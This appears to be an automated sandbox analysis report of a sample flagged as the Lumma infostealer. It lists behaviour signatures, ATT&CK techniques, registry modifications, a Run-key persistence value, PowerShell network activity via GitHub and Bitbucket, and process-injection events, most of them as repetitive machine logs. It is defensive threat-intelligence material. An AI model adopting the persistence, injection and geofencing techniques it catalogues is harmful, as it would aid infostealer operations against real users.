lumma | hxxps://youtube[.]com

max time kernel
309s
max time network
313s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
22-12-2024 23:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://youtube.com

Score

10^/10

lumma discovery execution persistence phishing stealer

Malware Config

Extracted

Family

lumma

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Blocklisted process makes network request 3 IoCs

flow	pid	Process
442	4876	powershell.exe
446	4876	powershell.exe
449	4876	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4544	powershell.exe
4876	powershell.exe

A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
3280	Vanta.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Vanta.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
446	bitbucket.org
441	raw.githubusercontent.com
442	raw.githubusercontent.com
445	bitbucket.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4876 set thread context of 3180	4876	powershell.exe	142

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Msbuild.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133793839042082380"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000ab045648dd4bdb014b33ab2ee74bdb017f228c07ca54db0114000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e8005398e082303024b98265d99428e115f0000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Downloads"	chrome.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-114766061-2901990051-2372745435-1000\{C270A664-A802-4E32-AE44-F430109B84F3}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "4"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "5"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	chrome.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
4080	chrome.exe
4080	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4168	chrome.exe
4544	powershell.exe
4544	powershell.exe
4544	powershell.exe
4876	powershell.exe
4876	powershell.exe
4876	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4056	7zG.exe
4504	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

pid	Process
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: 33	3640	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3640	AUDIODG.EXE
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe
Token: SeShutdownPrivilege	4080	chrome.exe
Token: SeCreatePagefilePrivilege	4080	chrome.exe

Suspicious use of FindShellTrayWindow 48 IoCs

pid	Process
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4056	7zG.exe
4000	7zG.exe
3440	7zG.exe
4056	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe
4080	chrome.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4504	chrome.exe
2508	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4080 wrote to memory of 4908	4080	chrome.exe	83
PID 4080 wrote to memory of 4908	4080	chrome.exe	83
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 2468	4080	chrome.exe	84
PID 4080 wrote to memory of 3200	4080	chrome.exe	85
PID 4080 wrote to memory of 3200	4080	chrome.exe	85
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86
PID 4080 wrote to memory of 2800	4080	chrome.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://youtube.com
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4080
- C:\Program Files\Google\Chrome\Application\chrome.exe
